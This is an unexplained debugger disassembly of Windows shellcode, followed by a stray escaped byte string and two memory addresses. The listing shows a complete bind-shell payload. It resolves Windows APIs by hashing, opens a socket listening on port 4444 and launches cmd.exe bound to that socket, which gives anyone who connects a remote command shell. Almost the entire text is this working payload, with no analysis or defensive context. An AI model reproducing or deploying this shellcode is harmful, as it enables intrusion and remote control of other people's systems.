0022F347   90               NOP
0022F348   FC               CLD
0022F349   E8 82000000      CALL 0022F3D0
0022F34E   60               PUSHAD
0022F34F   89E5             MOV EBP,ESP
0022F351   31C0             XOR EAX,EAX
0022F353   64:8B50 30       MOV EDX,DWORD PTR FS:[EAX+30]
0022F357   8B52 0C          MOV EDX,DWORD PTR DS:[EDX+C]
0022F35A   8B52 14          MOV EDX,DWORD PTR DS:[EDX+14]
0022F35D   8B72 28          MOV ESI,DWORD PTR DS:[EDX+28]
0022F360   0FB74A 26        MOVZX ECX,WORD PTR DS:[EDX+26]
0022F364   31FF             XOR EDI,EDI
0022F366   AC               LODS BYTE PTR DS:[ESI]
0022F367   3C 61            CMP AL,61
0022F369   7C 02            JL SHORT 0022F36D
0022F36B   2C 20            SUB AL,20
0022F36D   C1CF 0D          ROR EDI,0D
0022F370   01C7             ADD EDI,EAX
0022F372  ^E2 F2            LOOPD SHORT 0022F366
0022F374   52               PUSH EDX
0022F375   57               PUSH EDI
0022F376   8B52 10          MOV EDX,DWORD PTR DS:[EDX+10]
0022F379   8B4A 3C          MOV ECX,DWORD PTR DS:[EDX+3C]
0022F37C   8B4C11 78        MOV ECX,DWORD PTR DS:[ECX+EDX+78]
0022F380   E3 48            JECXZ SHORT 0022F3CA
0022F382   01D1             ADD ECX,EDX
0022F384   51               PUSH ECX
0022F385   8B59 20          MOV EBX,DWORD PTR DS:[ECX+20]
0022F388   01D3             ADD EBX,EDX
0022F38A   8B49 18          MOV ECX,DWORD PTR DS:[ECX+18]
0022F38D   E3 3A            JECXZ SHORT 0022F3C9
0022F38F   49               DEC ECX
0022F390   8B348B           MOV ESI,DWORD PTR DS:[EBX+ECX*4]
0022F393   01D6             ADD ESI,EDX
0022F395   31FF             XOR EDI,EDI
0022F397   AC               LODS BYTE PTR DS:[ESI]
0022F398   C1CF 0D          ROR EDI,0D
0022F39B   01C7             ADD EDI,EAX
0022F39D   38E0             CMP AL,AH
0022F39F  ^75 F6            JNZ SHORT 0022F397
0022F3A1   037D F8          ADD EDI,DWORD PTR SS:[EBP-8]
0022F3A4   3B7D 24          CMP EDI,DWORD PTR SS:[EBP+24]
0022F3A7  ^75 E4            JNZ SHORT 0022F38D
0022F3A9   58               POP EAX
0022F3AA   8B58 24          MOV EBX,DWORD PTR DS:[EAX+24]
0022F3AD   01D3             ADD EBX,EDX
0022F3AF   66:8B0C4B        MOV CX,WORD PTR DS:[EBX+ECX*2]
0022F3B3   8B58 1C          MOV EBX,DWORD PTR DS:[EAX+1C]
0022F3B6   01D3             ADD EBX,EDX
0022F3B8   8B048B           MOV EAX,DWORD PTR DS:[EBX+ECX*4]
0022F3BB   01D0             ADD EAX,EDX
0022F3BD   894424 24        MOV DWORD PTR SS:[ESP+24],EAX
0022F3C1   5B               POP EBX
0022F3C2   5B               POP EBX
0022F3C3   61               POPAD
0022F3C4   59               POP ECX
0022F3C5   5A               POP EDX
0022F3C6   51               PUSH ECX
0022F3C7   FFE0             JMP EAX
0022F3C9   5F               POP EDI
0022F3CA   5F               POP EDI
0022F3CB   5A               POP EDX
0022F3CC   8B12             MOV EDX,DWORD PTR DS:[EDX]
0022F3CE  ^EB 8D            JMP SHORT 0022F35D
0022F3D0   5D               POP EBP
0022F3D1   68 33320000      PUSH 3233
0022F3D6   68 7773325F      PUSH 5F327377
0022F3DB   54               PUSH ESP
0022F3DC   68 4C772607      PUSH 726774C
0022F3E1   FFD5             CALL EBP
0022F3E3   B8 90010000      MOV EAX,190
0022F3E8   29C4             SUB ESP,EAX
0022F3EA   54               PUSH ESP
0022F3EB   50               PUSH EAX
0022F3EC   68 29806B00      PUSH 6B8029
0022F3F1   FFD5             CALL EBP
0022F3F3   6A 08            PUSH 8
0022F3F5   59               POP ECX
0022F3F6   50               PUSH EAX
0022F3F7  ^E2 FD            LOOPD SHORT 0022F3F6
0022F3F9   40               INC EAX
0022F3FA   50               PUSH EAX
0022F3FB   40               INC EAX
0022F3FC   50               PUSH EAX
0022F3FD   68 EA0FDFE0      PUSH E0DF0FEA
0022F402   FFD5             CALL EBP
0022F404   97               XCHG EAX,EDI
0022F405   68 0200115C      PUSH 5C110002
0022F40A   89E6             MOV ESI,ESP
0022F40C   6A 10            PUSH 10
0022F40E   56               PUSH ESI
0022F40F   57               PUSH EDI
0022F410   68 C2DB3767      PUSH 6737DBC2
0022F415   FFD5             CALL EBP
0022F417   57               PUSH EDI
0022F418   68 B7E938FF      PUSH FF38E9B7
0022F41D   FFD5             CALL EBP
0022F41F   57               PUSH EDI
0022F420   68 74EC3BE1      PUSH E13BEC74
0022F425   FFD5             CALL EBP
0022F427   57               PUSH EDI
0022F428   97               XCHG EAX,EDI
0022F429   68 756E4D61      PUSH 614D6E75
0022F42E   FFD5             CALL EBP
0022F430   68 636D6400      PUSH 646D63
0022F435   89E3             MOV EBX,ESP
0022F437   57               PUSH EDI
0022F438   57               PUSH EDI
0022F439   57               PUSH EDI
0022F43A   31F6             XOR ESI,ESI
0022F43C   6A 12            PUSH 12
0022F43E   59               POP ECX
0022F43F   56               PUSH ESI
0022F440  ^E2 FD            LOOPD SHORT 0022F43F
0022F442   66:C74424 3C 010>MOV WORD PTR SS:[ESP+3C],101
0022F449   8D4424 10        LEA EAX,DWORD PTR SS:[ESP+10]
0022F44D   C600 44          MOV BYTE PTR DS:[EAX],44
0022F450   54               PUSH ESP
0022F451   50               PUSH EAX
0022F452   56               PUSH ESI
0022F453   56               PUSH ESI
0022F454   56               PUSH ESI
0022F455   46               INC ESI
0022F456   56               PUSH ESI
0022F457   4E               DEC ESI
0022F458   56               PUSH ESI
0022F459   56               PUSH ESI
0022F45A   53               PUSH EBX
0022F45B   56               PUSH ESI
0022F45C   68 79CC3F86      PUSH 863FCC79
0022F461   FFD5             CALL EBP
0022F463   89E0             MOV EAX,ESP
0022F465   4E               DEC ESI
0022F466   56               PUSH ESI
0022F467   46               INC ESI
0022F468   FF30             PUSH DWORD PTR DS:[EAX]
0022F46A   68 08871D60      PUSH 601D8708
0022F46F   FFD5             CALL EBP
0022F471   BB F0B5A256      MOV EBX,56A2B5F0
0022F476   68 A695BD9D      PUSH 9DBD95A6
0022F47B   FFD5             CALL EBP
0022F47D   3C 06            CMP AL,6
0022F47F   7C 0A            JL SHORT 0022F48B
0022F481   80FB E0          CMP BL,0E0
0022F484   75 05            JNZ SHORT 0022F48B
0022F486   BB 4713726F      MOV EBX,6F721347
0022F48B   6A 00            PUSH 0
0022F48D   53               PUSH EBX
0022F48E   FFD5             CALL EBP
0022F490   90               NOP



\x81\xEC\x00\x30\x00\x00




0022F730
0022C730
















